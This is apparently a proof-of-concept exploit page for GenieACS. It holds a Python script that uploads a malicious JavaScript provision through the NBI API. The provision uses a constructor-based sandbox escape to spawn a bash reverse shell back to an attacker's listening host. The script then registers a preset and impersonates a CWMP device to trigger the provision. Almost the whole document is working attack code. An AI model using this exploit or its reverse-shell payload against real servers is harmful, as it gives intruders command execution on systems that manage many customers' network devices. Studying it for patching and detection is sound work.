5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import random
import json
import string
import requests
import base64
import threading
import time
from xml.etree.ElementTree import Element, SubElement, tostring

# Configuration
TARGET_IP = "127.0.0.1"          # IP of the GenieACS server (e.g. docker host)
LHOST_IP = "host.docker.internal" # Your local IP for receiving the reverse shell (e.g. localhost/host.docker.internal)
LPORT = 4444                      # Your local port for receiving the reverse shell

ACS_URL = f"http://{TARGET_IP}:7547/"
NBI_URL = f"http://{TARGET_IP}:7557/"

def put_provision(name='revshell', LHOST=LHOST_IP, LPORT=LPORT):
    """Put a provision value into the device"""
    payload = f"""

    const global = declare.constructor.constructor('return this')();
    const process = global.process;
    const require = process.mainModule.require;

    try {{
        const net = require('net');
        const {{ spawn }} = require('child_process');
        
        // Create connection to attacker
        const client = new net.Socket();
        
        client.connect('{LPORT}', '{LHOST}', () => {{
            // Spawn shell process
            const shell = spawn('/bin/bash', ['-i']);
            
            // Pipe shell I/O to network connection
            client.pipe(shell.stdin);
            shell.stdout.pipe(client);
            shell.stderr.pipe(client);
            
            // Handle connection close
            shell.on('exit', () => client.end());
            client.on('error', () => shell.kill());
        }});
        
        return {{
            status: "Reverse shell initiated",
            target: `{LHOST}:{LPORT}`
        }};
    }} catch(e) {{
        return {{
            error: "Reverse shell failed: " + e.message
        }};
    }}
    """
        
    try:
        # Send the PUT request
        url = f"{NBI_URL}/provisions/{name}".replace("//provisions", "/provisions")
        print(f"URL: {url}")
        response = requests.put(
            url,
            data=payload,
            timeout=30,
        )
        print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error creating GenieACS provision: {e}")


def put_preset(preset_name, provision_name='revshell'):
    """Put a preset value into the device"""
    payload = {
            "weight": 0,
            "channel": preset_name, 
            "events": {"2 PERIODIC": True},
            "precondition": "",
            "configurations": [
                {"type": "provision", "name": provision_name, "args": None}
            ]
        }
        
    try:
        print(f"Payload: {json.dumps(payload, indent=2)}")
        
        # Send the PUT request
        url = f"{NBI_URL}/presets/{preset_name}".replace("//presets", "/presets")
        print(f"URL: {url}")
        response = requests.put(
            url,
            json=payload,
            timeout=30
        )
        print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error creating GenieACS preset: {e}")

# SOAP namespaces
NAMESPACES = {
    "soap-enc": "http://schemas.xmlsoap.org/soap/encoding/",
    "soap-env": "http://schemas.xmlsoap.org/soap/envelope/", 
    "xsd": "http://www.w3.org/2001/XMLSchema",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
    "cwmp": "urn:dslforum-org:cwmp-1-0"
}

# Global variables (these would be defined elsewhere in your Python module)
next_inform_timeout = None
pending_inform = False
device = None
session = requests.Session()
inform_interval = 2  # Periodic inform interval in seconds

def start_session(event=None):
    """
    Start a CWMP session by sending an Inform message
    
    Args:
        event (str, optional): The event type for the inform message
    """
    global next_inform_timeout, pending_inform, session
    
    # Cancel any existing timeout
    if next_inform_timeout:
        next_inform_timeout.cancel()
        next_inform_timeout = None
    
    # Reset session state and clear cookies to avoid 400 Bad Request
    pending_inform = False
    session.cookies.clear()
    
    print(f"Starting session with event: {event or '0 BOOTSTRAP'}")
    
    # Generate random request ID (8 character alphanumeric string)
    chars = string.ascii_lowercase + string.digits
    request_id = ''.join(random.choice(chars) for _ in range(8))
    
    # Define callback function for when inform body is ready
    def inform_callback(body):
        # Create SOAP XML document with request ID and body
        xml = create_soap_document(request_id, body)
        
        # Define callback for send request response
        def send_request_callback(response_xml):
            cpe_request()
        
        # Send the request
        send_request(xml, send_request_callback)
    
    # Call methods.inform with device, event, and callback
    methods.inform(device, event, inform_callback)


def create_soap_document(request_id, body):
    """Create SOAP XML document with proper namespaces"""
    # Create root envelope with namespaces
    envelope = Element("soap-env:Envelope")
    for prefix, uri in NAMESPACES.items():
        envelope.set(f"xmlns:{prefix}", uri)
    
    # Create header with ID
    header = SubElement(envelope, "soap-env:Header")
    id_element = SubElement(header, "cwmp:ID")
    id_element.set("soap-env:mustUnderstand", "1")
    id_element.text = request_id
    
    # Create body
    body_element = SubElement(envelope, "soap-env:Body")
    if body is not None:
        body_element.append(body)
    
    # Convert to string with XML declaration
    xml_str = tostring(envelope, encoding='unicode')
    return f'<?xml version="1.0" encoding="UTF-8"?>\n{xml_str}'


def send_request(xml, callback):
    """Send HTTP POST request with SOAP XML"""
    global session
    
    # Prepare headers
    headers = {
        'Content-Type': 'text/xml; charset="utf-8"',
        'SOAPAction': '""'
    }
    
    
    try:
        # Send POST request through proxy
        response = session.post(
            ACS_URL,
            data=xml or "",
            headers=headers,
            timeout=30
        )
        
        # Check response status
        response.raise_for_status()
        
        # Parse response XML if present
        response_xml = None
        if response.content:
            try:
                import xml.etree.ElementTree as ET
                response_xml = ET.fromstring(response.text)
            except ET.ParseError:
                response_xml = None
        
        # Call callback with parsed XML
        callback(response_xml)
        
    except requests.exceptions.RequestException as e:
        print(f"HTTP request failed: {e}")
        # On error, schedule next periodic inform
        schedule_next_periodic_inform()
        callback(None)


def schedule_next_periodic_inform():
    """Schedule the next periodic inform session"""
    global next_inform_timeout
    if next_inform_timeout:
        next_inform_timeout.cancel()
    
    next_inform_timeout = threading.Timer(inform_interval, lambda: start_session("2 PERIODIC"))
    next_inform_timeout.start()
    print(f"Next periodic inform scheduled in {inform_interval} seconds")


def cpe_request():
    """Handle CPE request and complete CWMP session"""
    print("Sending empty request to complete CWMP session...")
    
    # Send empty request to complete the session
    def empty_request_callback(response_xml):
        print("CWMP session completed")
        schedule_next_periodic_inform()
    
    send_request(None, empty_request_callback)


class methods:
    @staticmethod
    def inform(device, event, callback):
        """Create CWMP Inform message"""
        # Create Inform element
        inform = Element("cwmp:Inform")
        
        # Device ID
        device_id = SubElement(inform, "DeviceId")
        
        # Manufacturer
        manufacturer = SubElement(device_id, "Manufacturer")
        manufacturer.text = device.get("Device.DeviceInfo.Manufacturer", ["", "Unknown"])[1] if device else "Unknown"
        
        # OUI  
        oui = SubElement(device_id, "OUI")
        oui.text = device.get("Device.DeviceInfo.ManufacturerOUI", ["", "000000"])[1] if device else "000000"
        
        # Product Class
        product_class = SubElement(device_id, "ProductClass")
        product_class.text = device.get("Device.DeviceInfo.ProductClass", ["", "CPE"])[1] if device else "CPE"
        
        # Serial Number
        serial_number = SubElement(device_id, "SerialNumber")
        serial_number.text = device.get("Device.DeviceInfo.SerialNumber", ["", "123456"])[1] if device else "123456"
        
        # Event
        event_struct = SubElement(inform, "Event")
        event_item = SubElement(event_struct, "EventStruct")
        
        event_code = SubElement(event_item, "EventCode")
        event_code.text = event or "2 PERIODIC"
        
        command_key = SubElement(event_item, "CommandKey")
        command_key.text = ""
        
        # Max Envelopes
        max_envelopes = SubElement(inform, "MaxEnvelopes")
        max_envelopes.text = "1"
        
        # Current Time
        current_time = SubElement(inform, "CurrentTime")
        from datetime import datetime
        current_time.text = datetime.now().isoformat()
        
        # Retry Count
        retry_count = SubElement(inform, "RetryCount")
        retry_count.text = "0"
        
        # Parameter List (empty for now)
        parameter_list = SubElement(inform, "ParameterList")
        parameter_list.set("soap-enc:arrayType", "cwmp:ParameterValueStruct[0]")
        
        # Call callback with the inform body
        callback(inform)


def stop_periodic_informs():
    """Stop periodic inform sessions"""
    global next_inform_timeout
    if next_inform_timeout:
        next_inform_timeout.cancel()
        next_inform_timeout = None
    print("Periodic informs stopped")


# Example usage
if __name__ == "__main__":
    # Generate random serial number (12 character alphanumeric string)
    put_provision('revshell', LHOST_IP, LPORT)
    put_preset("exploit-periodic2",'revshell')
    chars = string.ascii_uppercase + string.digits
    random_serial = ''.join(random.choice(chars) for _ in range(12))
    
    # Sample device data structure
    device = {
        "Device.DeviceInfo.Manufacturer": ["xsd:string", "DF"],
        "Device.DeviceInfo.ManufacturerOUI": ["xsd:string", "123456"],
        "Device.DeviceInfo.ProductClass": ["xsd:string", "Exploit"],
        "Device.DeviceInfo.SerialNumber": ["xsd:string", random_serial]
    }
    
    print("Starting CWMP session...")
    print(f"Endpoint: {ACS_URL}")
    print(f"Device Serial Number: {random_serial}")
    print(f"Periodic inform interval: {inform_interval} seconds")
    
    try:
        # Start initial session with 2 PERIODIC event
        start_session("0 BOOTSTRAP")
        
        # Keep the program running to allow periodic informs
        print("Press Ctrl+C to stop periodic informs...")
        while True:
            time.sleep(1)
            
    except KeyboardInterrupt:
        print("\nShutting down...")
        stop_periodic_informs()
        print("Program terminated")